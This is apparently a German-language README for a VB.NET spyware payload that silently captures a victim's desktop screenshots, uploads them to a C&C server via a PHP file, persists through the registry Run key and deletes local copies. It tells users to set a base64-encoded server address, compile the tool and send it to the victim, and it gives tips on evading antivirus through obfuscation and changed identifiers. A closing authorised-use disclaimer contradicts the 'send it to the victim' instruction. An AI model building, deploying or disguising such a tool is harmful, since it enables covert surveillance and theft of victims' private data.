Stille Screenshot-Aufnahme | Post-Exploitation-Nutzlast | VB.NET
Eine einfache Nutzlast, um einen Screenshot des Desktops des Opfers zu erstellen und ihn auf das C&C hochzuladen.
Merkmale:
- Persistent (unter Verwendung des Registrierungs-Ausführungsschlüssels)
- Funktioniert im Hintergrund
- Weniger Code, weniger Fehler und weniger Erkennung ;)
- Löscht den Screenshot von der Festplatte, nachdem er auf C&C hochgeladen wurde
- C&C-Server in Base64
- Laden Sie Screenshots organisiert auf C&C hoch
- Keine Portweiterleitung erforderlich! funktioniert mit einer einzigen PHP-Datei
- [TODO] Maschineninformationen
- [TODO] Verschlüsselung
- [TODO] Intervall aus der Ferne über C&C einstellen
Installation und Nutzung:
- Klonen Sie dieses Repository.
- Als Webhosting empfehle ich namecheap
- Gehen Sie zu Ihrem public_html-Ordner, erstellen Sie eine neue PHP-Datei und fügen Sie den folgenden Code ein
- Öffnen Sie das Projekt in Visual Studio und bearbeiten Sie die Variable unten im Quellcode
Dim server As String = BaseDecode1("your server address here in base64 encoded")
- und bearbeiten Sie auch diese Variable unten
Dim php As String = "yourphpfilename.php?" & "folder="
- Kompilieren Sie es einfach und senden Sie es an das Opfer, das ist alles!!
Millionen-Dollar-Beratung ;)
Um die Antiviren-Erkennung zu vermeiden
- Ändern Sie das App-Symbol
- Neue GUID generieren
- Ändert alle Variablen
- Verschleiern Sie den Code mit Obfuscar
- Ändern Sie die Assembly-Informationen
Spende:
Wenn dieses Tool für Sie nützlich war, können Sie sich gerne bei mir bedanken, indem Sie mir einen Kaffee spendieren :)
Haftungsausschluss:
Dieses Tool darf nur auf autorisierten Systemen verwendet werden. Jede unbefugte Nutzung dieses Tools ohne ausdrückliche Genehmigung ist illegal.
Lizenz:
GNU ALLGEMEINE ÖFFENTLICHE LIZENZ
